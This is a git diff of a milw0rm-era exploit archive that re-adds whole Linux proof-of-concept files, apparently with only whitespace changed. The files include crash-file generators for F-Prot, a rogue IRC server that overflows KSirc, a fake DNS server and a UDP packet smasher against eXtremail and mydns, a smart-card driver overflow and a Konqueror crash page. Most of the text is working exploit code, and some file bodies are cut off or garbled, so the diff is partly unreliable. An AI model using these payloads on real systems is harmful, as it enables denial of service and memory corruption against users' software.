a/platforms/linux/dos/2892.py +++ b/platforms/linux/dos/2892.py 
@@ -1,42 +1,42 @@ -# fprot1.py - trivial proof of concept code for F-Prot 4.6.6 .ACE DoS -# -# Copyright (c) 2006 Evgeny Legerov -# -# Permission to use, copy, modify, and distribute this software for any -# purpose with or without fee is hereby granted, provided that the above -# copyright notice and this permission notice appear in all copies. -# -# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES -# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF -# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR -# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES -# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN -# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF -# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. -# -# To test this code on Linux: -# -# create ACE compressed file -# $ ./fprot1.py > 1.ace -# $ f-prot 1.ace - -import sys -import struct - -ACE=""" - 58 c5 31 00 00 00 90 2a 2a 41 43 45 2a 2a 14 14 - 02 00 31 12 82 33 b6 45 97 7d 00 00 00 00 16 2a - 55 4e 52 45 47 49 53 54 45 52 45 44 20 56 45 52 - 53 49 4f 4e 2a 6c 28 2c 00 01 01 00 d0 ff ff ff - 00 00 00 00 41 42 43 44 41 42 43 44 00 00 00 00 - 02 05 41 41 41 41 0d 00 41 41 41 41 41 41 41 41 - 41 41 41 41 41 -""" - -s = "" -for i in [chr(int(i, 16)) for i in ACE.split(" ") if len(i.strip()) > 0]: - s += i - -sys.stdout.write(s) - -# milw0rm.com [2006-12-04] +# fprot1.py - trivial proof of concept code for F-Prot 4.6.6 .ACE DoS +# +# Copyright (c) 2006 Evgeny Legerov +# +# Permission to use, copy, modify, and distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. 
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. +# +# To test this code on Linux: +# +# create ACE compressed file +# $ ./fprot1.py > 1.ace +# $ f-prot 1.ace + +import sys +import struct + +ACE=""" + 58 c5 31 00 00 00 90 2a 2a 41 43 45 2a 2a 14 14 + 02 00 31 12 82 33 b6 45 97 7d 00 00 00 00 16 2a + 55 4e 52 45 47 49 53 54 45 52 45 44 20 56 45 52 + 53 49 4f 4e 2a 6c 28 2c 00 01 01 00 d0 ff ff ff + 00 00 00 00 41 42 43 44 41 42 43 44 00 00 00 00 + 02 05 41 41 41 41 0d 00 41 41 41 41 41 41 41 41 + 41 41 41 41 41 +""" + +s = "" +for i in [chr(int(i, 16)) for i in ACE.split(" ") if len(i.strip()) > 0]: + s += i + +sys.stdout.write(s) + +# milw0rm.com [2006-12-04] diff --git a/platforms/linux/dos/2893.py b/platforms/linux/dos/2893.py index 5d87f5c23..7b50f73a9 100755 --- a/platforms/linux/dos/2893.py +++ b/platforms/linux/dos/2893.py 
@@ -1,57 +1,57 @@ -# fprot2.py - trivial proof of concept code for F-Prot 4.6.6 .CHM heap -# overflow -# -# Copyright (c) 2006 Evgeny Legerov -# -# Permission to use, copy, modify, and distribute this software for any -# purpose with or without fee is hereby granted, provided that the above -# copyright notice and this permission notice appear in all copies. -# -# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES -# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF -# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR -# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES -# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN -# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF -# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. -# -# $ ./fprot2.py > 1.chm -# $ f-prot 1.chm - -import sys -import struct - -s="" -s+="ITSF" # signature -s+=struct.pack(" 1.chm +# $ f-prot 1.chm + +import sys +import struct + +s="" +s+="ITSF" # signature +s+=struct.pack("::count () from /usr/kde/3.5/lib/libkhtml.so.4 -#2 0xb64b0550 in TestFunctionImp::~TestFunctionImp () from /usr/kde/3.5/lib/libkhtml.so.4 -#3 0xb64b43a2 in TestFunctionImp::~TestFunctionImp () from /usr/kde/3.5/lib/libkhtml.so.4 -#4 0xb63329d5 in DOM::RegisteredListenerList::getHTMLEventListener () from /usr/kde/3.5/lib/libkhtml.so.4 -#5 0xbf86ae90 in ?? () -#6 0x00000001 in ?? () -#7 0xb736f8ec in ?? () from /usr/qt/3/lib/libqt-mt.so.3 -#8 0xb71e36f9 in qt_check_pointer () from /usr/qt/3/lib/libqt-mt.so.3 -Previous frame inner to this frame (corrupt stack?) - -CRASH CODE: -=========== ---> - - - -> - - - - -# milw0rm.com [2006-12-19] + + + + +> + + + + +# milw0rm.com [2006-12-19] diff --git a/platforms/linux/dos/3023.c b/platforms/linux/dos/3023.c index cc88fd56f..e66f0ccdf 100755 --- a/platforms/linux/dos/3023.c +++ b/platforms/linux/dos/3023.c 
@@ -1,88 +1,88 @@
-// KSirc 1.3.12 - PRIVMSG remote Buffer Overflow // PoC
-//
-// Federico L. Bossi Bonin
-// fbossi@globalst.com.ar
-// www.GlobalST.com.ar
-
-
-// #0 0xb7ea8792 in KSircIOController::stdout_read () from /usr/kde/3.5/lib/libkdeinit_ksirc.so
-// #1 0xb7ea78c8 in KSircIOController::qt_invoke () from /usr/kde/3.5/lib/libkdeinit_ksirc.so
-// #2 0xb6fedba4 in QObject::activate_signal () from /usr/qt/3/lib/libqt-mt.so.3
-// #3 0xb765410b in KProcess::receivedStdout () from /usr/kde/3.5/lib/libkdecore.so.4
-// #4 0x081a6e60 in ?? ()
-// #5 0x081a7238 in ?? ()
-// #6 0xbfcb0170 in ?? ()
-// #7 0x00000000 in ?? ()
-
-#include
-#include
-#include
-#include
-
-#define PORT 6667
-#define LEN 2500
-
-char buffer[LEN*2];
-void sendbuff(int sock) {
-char ptr[LEN*2];
-memset(buffer,0x0,sizeof(buffer));
-memset(ptr,0x0,sizeof(ptr));
-memset(ptr,0x41,LEN);
-sprintf(buffer,"PRIVMSG USER:%s\n\r",ptr);
-read(sock,ptr,sizeof(ptr));
-write(sock,buffer,sizeof(buffer));
-}
-
-int main() {
-struct sockaddr_in srv_addr, client;
-int len,pid,sockfd,sock;
-
-sockfd = socket(AF_INET, SOCK_STREAM, 0);
-
-if (sockfd < 0) {
-perror("error socket()");
-exit(1);
-}
-
-bzero((char *) &srv_addr, sizeof(srv_addr));
-srv_addr.sin_family = AF_INET;
-srv_addr.sin_addr.s_addr = INADDR_ANY;
-srv_addr.sin_port = htons(PORT);
-
-if (bind(sockfd, (struct sockaddr *) &srv_addr,sizeof(srv_addr)) < 0) {
-perror("error bind()");
-exit(1);
-}
-
-
-printf("KSirc 1.3.12 - PRIVMSG remote PoC\n");
-printf("====================================\n");
-printf("Listening on port %i\n",PORT);
-
-listen(sockfd,5);
-len = sizeof(client);
-
-while (1) {
-sock = accept(sockfd, (struct sockaddr *) &client, &len);
-if (sock < 0) {
-perror("error accept()");
-exit(1);
-}
-
-pid = fork();
-if (pid < 0) {
-perror("fork()");
-exit(1);
-}
-if (pid == 0) {
-close(sockfd);
-printf("Conection from %s\n",inet_ntoa(client.sin_addr));
-sendbuff(sock);
-exit(0);
-}
-else close(sock);
-}
-return 0;
-}
-
-// milw0rm.com 
[2006-12-26]
+// KSirc 1.3.12 - PRIVMSG remote Buffer Overflow // PoC
+//
+// Federico L. Bossi Bonin
+// fbossi@globalst.com.ar
+// www.GlobalST.com.ar
+
+
+// #0 0xb7ea8792 in KSircIOController::stdout_read () from /usr/kde/3.5/lib/libkdeinit_ksirc.so
+// #1 0xb7ea78c8 in KSircIOController::qt_invoke () from /usr/kde/3.5/lib/libkdeinit_ksirc.so
+// #2 0xb6fedba4 in QObject::activate_signal () from /usr/qt/3/lib/libqt-mt.so.3
+// #3 0xb765410b in KProcess::receivedStdout () from /usr/kde/3.5/lib/libkdecore.so.4
+// #4 0x081a6e60 in ?? ()
+// #5 0x081a7238 in ?? ()
+// #6 0xbfcb0170 in ?? ()
+// #7 0x00000000 in ?? ()
+
+#include
+#include
+#include
+#include
+
+#define PORT 6667
+#define LEN 2500
+
+char buffer[LEN*2];
+void sendbuff(int sock) {
+char ptr[LEN*2];
+memset(buffer,0x0,sizeof(buffer));
+memset(ptr,0x0,sizeof(ptr));
+memset(ptr,0x41,LEN);
+sprintf(buffer,"PRIVMSG USER:%s\n\r",ptr);
+read(sock,ptr,sizeof(ptr));
+write(sock,buffer,sizeof(buffer));
+}
+
+int main() {
+struct sockaddr_in srv_addr, client;
+int len,pid,sockfd,sock;
+
+sockfd = socket(AF_INET, SOCK_STREAM, 0);
+
+if (sockfd < 0) {
+perror("error socket()");
+exit(1);
+}
+
+bzero((char *) &srv_addr, sizeof(srv_addr));
+srv_addr.sin_family = AF_INET;
+srv_addr.sin_addr.s_addr = INADDR_ANY;
+srv_addr.sin_port = htons(PORT);
+
+if (bind(sockfd, (struct sockaddr *) &srv_addr,sizeof(srv_addr)) < 0) {
+perror("error bind()");
+exit(1);
+}
+
+
+printf("KSirc 1.3.12 - PRIVMSG remote PoC\n");
+printf("====================================\n");
+printf("Listening on port %i\n",PORT);
+
+listen(sockfd,5);
+len = sizeof(client);
+
+while (1) {
+sock = accept(sockfd, (struct sockaddr *) &client, &len);
+if (sock < 0) {
+perror("error accept()");
+exit(1);
+}
+
+pid = fork();
+if (pid < 0) {
+perror("fork()");
+exit(1);
+}
+if (pid == 0) {
+close(sockfd);
+printf("Conection from %s\n",inet_ntoa(client.sin_addr));
+sendbuff(sock);
+exit(0);
+}
+else close(sock);
+}
+return 0;
+}
+
+// milw0rm.com 
[2006-12-26] diff --git a/platforms/linux/dos/306.c b/platforms/linux/dos/306.c index b84fdc5a2..73cdef543 100755 --- a/platforms/linux/dos/306.c +++ b/platforms/linux/dos/306.c @@ -68,6 +68,6 @@ int main(int argc, char *argv[]) return 0; } // < - -# milw0rm.com [2007-03-02] + + +# milw0rm.com [2007-03-02] diff --git a/platforms/linux/dos/3415.html b/platforms/linux/dos/3415.html index e8800daf5..a5064dbda 100755 --- a/platforms/linux/dos/3415.html +++ b/platforms/linux/dos/3415.html @@ -1,28 +1,28 @@ - - - -Demo of how to make Konqueror 3.5.5 crash by mark@bindshell.net.

-Simply load this file in Konqueror. Vulnerable versions should segfault instantly with a null pointer exception.

-

- - - - - -# milw0rm.com [2007-03-05] + + + +Demo of how to make Konqueror 3.5.5 crash by mark@bindshell.net.

+Simply load this file in Konqueror. Vulnerable versions should segfault instantly with a null pointer exception.

+

+ + + + + +# milw0rm.com [2007-03-05] diff --git a/platforms/linux/dos/3441.c b/platforms/linux/dos/3441.c index 8fb9b5aea..76ce72a56 100755 --- a/platforms/linux/dos/3441.c +++ b/platforms/linux/dos/3441.c 
@@ -1,42 +1,42 @@
-/*
- * Linux Omnikey Cardman 4040 driver buffer overflow (CVE-2007-0005)
- * Copyright (C) Daniel Roethlisberger
- * Compass Security Network Computing AG, Rapperswil, Switzerland.
- * All rights reserved.
- * http://www.csnc.ch/
- */
-
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-int main(int argc, char *argv[]) {
- int fd, i, n;
- char buf[8192];
-
- /*
- * 0 1 2 3 4 5 6 7 8 9 a b c d e f ...
- * 00 01 00 02 00 03 00 04 00 05 00 06 00 07 00 08 ...
- */
- for (i = 0; i < sizeof(buf); i += 2) {
- buf[i] = (char)(((i/2) & 0xFF00) >> 8);
- buf[i+1] = (char) ((i/2) & 0x00FF);
- }
-
- if ((fd = open("/dev/cmx0", O_RDWR)) < 0) {
- printf("Error: open() => %s\n", strerror(errno));
- exit(errno);
- }
- if ((n = write(fd, buf, sizeof(buf))) < 0) {
- printf("Error: write() => %s\n", strerror(errno));
- exit(errno);
- }
- printf("%d of %d bytes written\n", n, sizeof(buf));
- exit(0);
-}
-
-// milw0rm.com [2007-03-09]
+/*
+ * Linux Omnikey Cardman 4040 driver buffer overflow (CVE-2007-0005)
+ * Copyright (C) Daniel Roethlisberger
+ * Compass Security Network Computing AG, Rapperswil, Switzerland.
+ * All rights reserved.
+ * http://www.csnc.ch/
+ */
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+int main(int argc, char *argv[]) {
+ int fd, i, n;
+ char buf[8192];
+
+ /*
+ * 0 1 2 3 4 5 6 7 8 9 a b c d e f ...
+ * 00 01 00 02 00 03 00 04 00 05 00 06 00 07 00 08 ...
+ */
+ for (i = 0; i < sizeof(buf); i += 2) {
+ buf[i] = (char)(((i/2) & 0xFF00) >> 8);
+ buf[i+1] = (char) ((i/2) & 0x00FF);
+ }
+
+ if ((fd = open("/dev/cmx0", O_RDWR)) < 0) {
+ printf("Error: open() => %s\n", strerror(errno));
+ exit(errno);
+ }
+ if ((n = write(fd, buf, sizeof(buf))) < 0) {
+ printf("Error: write() => %s\n", strerror(errno));
+ exit(errno);
+ }
+ printf("%d of %d bytes written\n", n, sizeof(buf));
+ exit(0);
+}
+
+// milw0rm.com [2007-03-09]
diff --git a/platforms/linux/dos/3586.php b/platforms/linux/dos/3586.php index 93cbadfb0..a2488ea93 100755 --- a/platforms/linux/dos/3586.php +++ b/platforms/linux/dos/3586.php @@ -1,42 +1,42 @@ - - -# milw0rm.com [2007-03-27] + + +# milw0rm.com [2007-03-27] diff --git a/platforms/linux/dos/370.c b/platforms/linux/dos/370.c index bce2ebb0d..a77fcd0ea 100755 --- a/platforms/linux/dos/370.c +++ b/platforms/linux/dos/370.c @@ -148,6 +148,6 @@ by CoKi [+] conecting... OK [+] sending exploit... OK -coki@servidor:~$ - -// milw0rm.com [2004-08-02] +coki@servidor:~$ + +// milw0rm.com [2004-08-02] diff --git a/platforms/linux/dos/3769.c b/platforms/linux/dos/3769.c index ad88f3bea..d0ced4ee6 100755 --- a/platforms/linux/dos/3769.c +++ b/platforms/linux/dos/3769.c 
@@ -1,140 +1,140 @@ -/* extremail-v9.c - * - * Copyright (c) 2007 by - * - * eXtremail <2.1.1 remote root POC (x86-lnx) - * by mu-b - Tue Feb 6 2007 - * - * - Tested on: eXtremail 2.1.0 (lnx) - * eXtremail 2.1.1 (lnx) - * - * POC for DNS parsing bugs... - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by - * the Free Software Foundation; version 2 of the License. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - * - * http://www.digit-labs.org/ -- Digit-Labs 2007!@$! - */ - -#include -#include -#include -#include -#include -#include - -#define DNS_HDR_LEN 12 -#define DNS_TRAIL_LEN 20 - -#define DNS_PORT 53 -#define DNS_MAX_MSG 0x200 - -#define HAMMER_LEN 284 - -static char * dns_hdr_buf = - "\x69\x69" /* transaction id */ - "\x81\x80" /* flags */ - "\x00\x01" /* questions */ - "\x00\x01" /* answers rrs */ - "\x00\x00" /* authority rrs */ - "\x00\x00"; /* additional rrs */ - -static char * dns_trail_buf = - "\x00\x01" /* type */ - "\x00\x01" /* class */ - /* Answers */ - "\xc0\x0c" /* name ptr */ - "\x00\x01" /* type */ - "\x00\x01" /* class */ - "\x00\x01\x51\x80" /* ttl (1 day) */ - "\x00\x04" /* data length */ - "\xff\xff\xff\xff"; /* 255.255.255.255 */ - -int -main (int argc, char *argv[]) -{ - int sock, result; - struct sockaddr_in cliaddr, servaddr; - - printf ("eXtremail 2.1.1 remote root POC\n" - "by: \n" - "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); - - sock = socket (AF_INET, SOCK_DGRAM, 0); - if (sock < 0) - { - perror ("socket()"); - exit (EXIT_FAILURE); - } - - servaddr.sin_family = AF_INET; - servaddr.sin_addr.s_addr = htonl (INADDR_ANY); - servaddr.sin_port = htons (DNS_PORT); - result = bind (sock, (struct sockaddr *) &servaddr, sizeof 
servaddr); - if (result < 0) - { - perror ("bind()"); - exit (EXIT_FAILURE); - } - - printf ("+Waiting for data on port %d...\n", DNS_PORT); - - while (1) - { - int n, clilen, curlen, len; - char rbuf[DNS_MAX_MSG], sbuf[DNS_MAX_MSG*4]; - char *ptr; - - memset (rbuf, 0, sizeof rbuf); - memset (sbuf, 0, sizeof sbuf); - - /* receive message */ - clilen = sizeof cliaddr; - n = recvfrom (sock, rbuf, DNS_MAX_MSG, 0, (struct sockaddr *) &cliaddr, &clilen); - - if (n < 0) - { - printf ("- cannot receive data!\n"); - continue; - } - - /* print received message */ - printf ("+ Connection from %s: %u\n", - inet_ntoa (cliaddr.sin_addr), - ntohs (cliaddr.sin_port)); - - /* formulate reply */ - ptr = sbuf; - memcpy (ptr, dns_hdr_buf, DNS_HDR_LEN); - ptr += DNS_HDR_LEN; - - for (len = 0; len < HAMMER_LEN; ptr += curlen) - { - if (len + 63 > HAMMER_LEN) - curlen = HAMMER_LEN - len; - else - curlen = 63; - - len += curlen; - *ptr++ = curlen; - memset (ptr, 0x41, curlen); - } - - *((unsigned long *)(ptr - 4)) = 0xdeadbeef; - *ptr++ = 0x00; - memcpy (ptr, dns_trail_buf, DNS_TRAIL_LEN); - ptr += DNS_TRAIL_LEN; - - n = sendto (sock, sbuf, ptr-sbuf, 0, (struct sockaddr *) &cliaddr, clilen); - } - - return (EXIT_SUCCESS); -} - -// milw0rm.com [2007-04-20] +/* extremail-v9.c + * + * Copyright (c) 2007 by + * + * eXtremail <2.1.1 remote root POC (x86-lnx) + * by mu-b - Tue Feb 6 2007 + * + * - Tested on: eXtremail 2.1.0 (lnx) + * eXtremail 2.1.1 (lnx) + * + * POC for DNS parsing bugs... + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; version 2 of the License. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. 
+ * + * http://www.digit-labs.org/ -- Digit-Labs 2007!@$! + */ + +#include +#include +#include +#include +#include +#include + +#define DNS_HDR_LEN 12 +#define DNS_TRAIL_LEN 20 + +#define DNS_PORT 53 +#define DNS_MAX_MSG 0x200 + +#define HAMMER_LEN 284 + +static char * dns_hdr_buf = + "\x69\x69" /* transaction id */ + "\x81\x80" /* flags */ + "\x00\x01" /* questions */ + "\x00\x01" /* answers rrs */ + "\x00\x00" /* authority rrs */ + "\x00\x00"; /* additional rrs */ + +static char * dns_trail_buf = + "\x00\x01" /* type */ + "\x00\x01" /* class */ + /* Answers */ + "\xc0\x0c" /* name ptr */ + "\x00\x01" /* type */ + "\x00\x01" /* class */ + "\x00\x01\x51\x80" /* ttl (1 day) */ + "\x00\x04" /* data length */ + "\xff\xff\xff\xff"; /* 255.255.255.255 */ + +int +main (int argc, char *argv[]) +{ + int sock, result; + struct sockaddr_in cliaddr, servaddr; + + printf ("eXtremail 2.1.1 remote root POC\n" + "by: \n" + "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); + + sock = socket (AF_INET, SOCK_DGRAM, 0); + if (sock < 0) + { + perror ("socket()"); + exit (EXIT_FAILURE); + } + + servaddr.sin_family = AF_INET; + servaddr.sin_addr.s_addr = htonl (INADDR_ANY); + servaddr.sin_port = htons (DNS_PORT); + result = bind (sock, (struct sockaddr *) &servaddr, sizeof servaddr); + if (result < 0) + { + perror ("bind()"); + exit (EXIT_FAILURE); + } + + printf ("+Waiting for data on port %d...\n", DNS_PORT); + + while (1) + { + int n, clilen, curlen, len; + char rbuf[DNS_MAX_MSG], sbuf[DNS_MAX_MSG*4]; + char *ptr; + + memset (rbuf, 0, sizeof rbuf); + memset (sbuf, 0, sizeof sbuf); + + /* receive message */ + clilen = sizeof cliaddr; + n = recvfrom (sock, rbuf, DNS_MAX_MSG, 0, (struct sockaddr *) &cliaddr, &clilen); + + if (n < 0) + { + printf ("- cannot receive data!\n"); + continue; + } + + /* print received message */ + printf ("+ Connection from %s: %u\n", + inet_ntoa (cliaddr.sin_addr), + ntohs (cliaddr.sin_port)); + + /* formulate reply */ + ptr = sbuf; + memcpy (ptr, 
dns_hdr_buf, DNS_HDR_LEN); + ptr += DNS_HDR_LEN; + + for (len = 0; len < HAMMER_LEN; ptr += curlen) + { + if (len + 63 > HAMMER_LEN) + curlen = HAMMER_LEN - len; + else + curlen = 63; + + len += curlen; + *ptr++ = curlen; + memset (ptr, 0x41, curlen); + } + + *((unsigned long *)(ptr - 4)) = 0xdeadbeef; + *ptr++ = 0x00; + memcpy (ptr, dns_trail_buf, DNS_TRAIL_LEN); + ptr += DNS_TRAIL_LEN; + + n = sendto (sock, sbuf, ptr-sbuf, 0, (struct sockaddr *) &cliaddr, clilen); + } + + return (EXIT_SUCCESS); +} + +// milw0rm.com [2007-04-20] diff --git a/platforms/linux/dos/3807.c b/platforms/linux/dos/3807.c index 903e0fde5..a64405fc3 100755 --- a/platforms/linux/dos/3807.c +++ b/platforms/linux/dos/3807.c 
@@ -1,154 +1,154 @@ -/* mydns-rr-smash.c - * - * Copyright (c) 2007 by - * - * mydns remote exploit PoC (x86-lnx) - * by mu-b - Apr 2007 - * - * - Tested on: mydns-1.1.0 (.tar.gz) - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by - * the Free Software Foundation; version 2 of the License. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - * - * http://www.digit-labs.org/ -- Digit-Labs 2007!@$! - */ - -#include -#include -#include -#include -#include -#include - -#define BUF_SIZE 512 -#define NOP 0x41 - -#define DEF_PORT 53 -#define PORT_DNS DEF_PORT - -static void sock_send_udp (u_char * host, int port, u_char * src, int len); -static void zbuffami (u_char * zbuf, u_char *domain); - -static void -sock_send_udp (u_char * host, int port, u_char * src, int len) -{ - struct sockaddr_in address; - struct hostent *hp; - int sock; - - fflush (stdout); - if ((sock = socket (AF_INET, SOCK_DGRAM, 0)) == -1) - { - perror ("socket()"); - exit (-1); - } - - if ((hp = gethostbyname (host)) == NULL) - { - perror ("gethostbyname()"); - exit (-1); - } - - memset (&address, 0, sizeof (address)); - memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length); - address.sin_family = AF_INET; - address.sin_port = htons (port); - - sendto (sock, src, len, 0, (struct sockaddr *) &address, sizeof (address)); -} - -static void -zbuffami (u_char * zbuf, u_char *domain) -{ - u_char *ptr, *bgn, *end; - - ptr = zbuf; - *ptr++ = 0x69; /* transaction id */ - *ptr++ = 0x69; - *ptr++ = 0x28; /* flags */ - *ptr++ = 0x80; - *ptr++ = 0x00; /* number of questions */ - *ptr++ = 0x01; - *ptr++ = 0x00; /* number of answers */ - *ptr++ = 0x01; - *ptr++ = 0x00; /* number of authority rr's */ - *ptr++ = 
0x01; - *ptr++ = 0x00; /* number of additional rr's */ - *ptr++ = 0x00; - - /* question */ - bgn = strtok (domain, "."); - while (bgn != NULL) - { - unsigned int len; - - len = strlen (bgn); - *ptr++ = len; - memcpy (ptr, bgn, len); - ptr += len; - - bgn = strtok (NULL, "."); - } - *ptr++ = 0x00; /* terminate name */ - - *ptr++ = 0x00; /* type */ - *ptr++ = 0x06; - *ptr++ = 0xff; /* class */ - *ptr++ = 0xff; - - /* update */ - *ptr++ = 0x00; /* . */ - *ptr++ = 0x00; /* rr->type */ - *ptr++ = 0x00; - *ptr++ = 0x00; /* rr->class */ - *ptr++ = 0x01; - *ptr++ = 0xff; /* rr->ttl */ - *ptr++ = 0xff; - *ptr++ = 0xff; - *ptr++ = 0xff; - *ptr++ = 0xff; /* rr->rdlength */ - *ptr++ = 0xff; - - /* rrdata */ - printf ("NOP: %d\n", BUF_SIZE - (ptr - zbuf)); - memset (ptr, NOP, BUF_SIZE - (ptr - zbuf)); -} - -int -main (int argc, char **argv) -{ - int sock; - u_char zbuf[BUF_SIZE]; - - printf ("mydns <= 1.1.0 remote exploit PoC\n" - "by: \n" - "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); - - if (argc <= 2) - { - fprintf (stderr, "Usage: %s \n", argv[0]); - exit (EXIT_SUCCESS); - } - - printf ("+Attacking to %s...\n", argv[1]); - - printf ("+Building evil query..."); - memset (zbuf, 0x00, sizeof (zbuf)); - zbuffami (zbuf, argv[2]); - printf (" done\n"); - - printf ("+Sending Payload..."); - sock_send_udp (argv[1], PORT_DNS, zbuf, BUF_SIZE); - printf (" done\n"); - sleep (1); - - return (EXIT_SUCCESS); -} - -// milw0rm.com [2007-04-27] +/* mydns-rr-smash.c + * + * Copyright (c) 2007 by + * + * mydns remote exploit PoC (x86-lnx) + * by mu-b - Apr 2007 + * + * - Tested on: mydns-1.1.0 (.tar.gz) + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; version 2 of the License. 
+ * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * http://www.digit-labs.org/ -- Digit-Labs 2007!@$! + */ + +#include +#include +#include +#include +#include +#include + +#define BUF_SIZE 512 +#define NOP 0x41 + +#define DEF_PORT 53 +#define PORT_DNS DEF_PORT + +static void sock_send_udp (u_char * host, int port, u_char * src, int len); +static void zbuffami (u_char * zbuf, u_char *domain); + +static void +sock_send_udp (u_char * host, int port, u_char * src, int len) +{ + struct sockaddr_in address; + struct hostent *hp; + int sock; + + fflush (stdout); + if ((sock = socket (AF_INET, SOCK_DGRAM, 0)) == -1) + { + perror ("socket()"); + exit (-1); + } + + if ((hp = gethostbyname (host)) == NULL) + { + perror ("gethostbyname()"); + exit (-1); + } + + memset (&address, 0, sizeof (address)); + memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length); + address.sin_family = AF_INET; + address.sin_port = htons (port); + + sendto (sock, src, len, 0, (struct sockaddr *) &address, sizeof (address)); +} + +static void +zbuffami (u_char * zbuf, u_char *domain) +{ + u_char *ptr, *bgn, *end; + + ptr = zbuf; + *ptr++ = 0x69; /* transaction id */ + *ptr++ = 0x69; + *ptr++ = 0x28; /* flags */ + *ptr++ = 0x80; + *ptr++ = 0x00; /* number of questions */ + *ptr++ = 0x01; + *ptr++ = 0x00; /* number of answers */ + *ptr++ = 0x01; + *ptr++ = 0x00; /* number of authority rr's */ + *ptr++ = 0x01; + *ptr++ = 0x00; /* number of additional rr's */ + *ptr++ = 0x00; + + /* question */ + bgn = strtok (domain, "."); + while (bgn != NULL) + { + unsigned int len; + + len = strlen (bgn); + *ptr++ = len; + memcpy (ptr, bgn, len); + ptr += len; + + bgn = strtok (NULL, "."); + } + *ptr++ = 0x00; /* terminate name */ + + *ptr++ = 0x00; /* type */ + *ptr++ = 0x06; + *ptr++ = 0xff; /* class */ 
+ *ptr++ = 0xff; + + /* update */ + *ptr++ = 0x00; /* . */ + *ptr++ = 0x00; /* rr->type */ + *ptr++ = 0x00; + *ptr++ = 0x00; /* rr->class */ + *ptr++ = 0x01; + *ptr++ = 0xff; /* rr->ttl */ + *ptr++ = 0xff; + *ptr++ = 0xff; + *ptr++ = 0xff; + *ptr++ = 0xff; /* rr->rdlength */ + *ptr++ = 0xff; + + /* rrdata */ + printf ("NOP: %d\n", BUF_SIZE - (ptr - zbuf)); + memset (ptr, NOP, BUF_SIZE - (ptr - zbuf)); +} + +int +main (int argc, char **argv) +{ + int sock; + u_char zbuf[BUF_SIZE]; + + printf ("mydns <= 1.1.0 remote exploit PoC\n" + "by: \n" + "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); + + if (argc <= 2) + { + fprintf (stderr, "Usage: %s \n", argv[0]); + exit (EXIT_SUCCESS); + } + + printf ("+Attacking to %s...\n", argv[1]); + + printf ("+Building evil query..."); + memset (zbuf, 0x00, sizeof (zbuf)); + zbuffami (zbuf, argv[2]); + printf (" done\n"); + + printf ("+Sending Payload..."); + sock_send_udp (argv[1], PORT_DNS, zbuf, BUF_SIZE); + printf (" done\n"); + sleep (1); + + return (EXIT_SUCCESS); +} + +// milw0rm.com [2007-04-27] diff --git a/platforms/linux/dos/4216.pl b/platforms/linux/dos/4216.pl index f76c3d3cc..b1a1b0330 100755 --- a/platforms/linux/dos/4216.pl +++ b/platforms/linux/dos/4216.pl 
